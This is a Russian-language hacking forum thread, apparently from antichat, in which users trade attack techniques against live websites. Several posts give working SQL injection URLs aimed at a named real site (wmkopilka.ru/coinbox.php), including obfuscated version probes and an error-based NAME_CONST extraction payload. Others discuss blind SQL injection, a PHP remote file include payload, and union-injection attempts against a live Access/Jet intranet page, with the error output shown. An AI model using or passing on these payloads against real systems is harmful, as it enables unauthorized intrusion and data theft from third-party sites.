Всем привет. Xttp://www.wmkopilka.ru/coinbox.php?5240' Кто что скажет? Два дня пытался крутить результата ноль
Есть =) http://wmkopilka.ru/coinbox.php?5240'/**/and/**/substring((select/**/version()),1,1)=5/**/and/**/'1'='1
А можно вообще без substring, т.к. мускуль конвертирует типы данных. Code: http://wmkopilka.ru/coinbox.php?5240'/**/and/**/version()=5/**/and/**/'1'='1
А можно и вывод сделать: Code: http://wmkopilka.ru/coinbox.php?5240'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1 https://forum.antichat.ru/showpost.php?p=1494443&postcount=11 Для кого человек старался? Почему не используете?
Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)? Я вот хотел узнать к чему можно "подцепиться" ) чтоб дальше узнать что делать. Нет так сказать "универсальные" трюки для уловки SQL инекци ?
Какой SQL inj ? Здесь базой данных то и не пахнет. У тебя есть инклайд. PHP: <?php if (isset($_GET['q'])){ include($_GET['q'].".php"); } ?> ты получишь RFI (Remote File Include): site.com/script.php?q=http://site.net/file рузумееться при сообтетствующей конфигурации WEB сервера. А именно - для RFI должен быть включен allow_url_include в php.ini Так же можно юзать как и лфи. Советую почитать статью задохлика: http://forum.antichat.ru/thread23501.html
на днях первый раз в жизни столкнулся со следующим адресом: www.site.com/default.php?show=100+and+ascii(lower(substring(version(),1,1)))=51 Можете объяснить или дать что либо почитать, что, в какой версии и вообще где применяется
Кури Blind SQL inj http://forum.antichat.ru/thread19844.html Затем прочти пару статей от електа на тему реализации more1row инъецкий. Так же говорять что Qwazar очень хорошо описал какую то новую технотогию, точно не скажу, сам еще не читал эту статью.
можеть кто знает в Jet database error на запрос: Code: =-1+order+by+5%00 выдает: Code: Microsoft JET Database Engine error '80040e14' The Microsoft Jet database engine does not recognize '6' as a valid field name or expression. а на: =-1+order+by+4%00 страница открывается, но на нем тоже Code: Latest News Microsoft JET Database Engine error '80040e14' The Microsoft Jet database engine does not recognize '4' as a valid field name or expression. /intranet/inx/ecom_engine.asp, line 2462 на запрос: Code: =-1+union+select+1,2,3,4%00 Code: Microsoft JET Database Engine error '80004005' Query input must contain at least one table or query. /intranet/inx/ecom_engine.asp, line 2462 как обойти? Правда ни одного названия таблиц не знаю. Может есть новые статьи по Jet database
Кстати, читаю про PHP inject (include), мне даже очень интересно кажется ) спасибо за направление ! Кстати, хотел узнать тенденцию этого уязвимости.. т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
на 1 из предложенных багов месте по распространенности идет sql injection а потом и PHP injection вообще пхп иньекцию можно встретить часто)))
[x60]unu это хорошо )) думаю php inject легче изучать, чем sql )) а еще такой ламерсий вопрос: - какие данные можно получить?
на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да? про LFI/RFI-уязвимости читал ЗДЕСЬ , но не очень понятно был что, зачем и как.. попробую еще искать ... спасибо за помощь.
B1t.exe Давай ты всётаки не будешь засорять эту тему. Вот же твоя тема, она открыта: https://forum.antichat.ru/threadedpost1665798.html#post1665798 тут рассматриваем конкретные уязвимости, сложности с ними, и т.д. Для твоих вопросов(и аналогичных) специально оставил ту тему YuNi|[c Обходы чего? Если ты читал статью, то должен был увидеть, что выборка в Access ОБЯЗАТЕЛЬНО должна быть из существующей таблицы. Ты это хочешь обойти что-ли? Или ты хочешь что-бы мы писали тебе варианты таблиц, а ты проверял? Линка-то нет. Сформулируй вопрос яснее
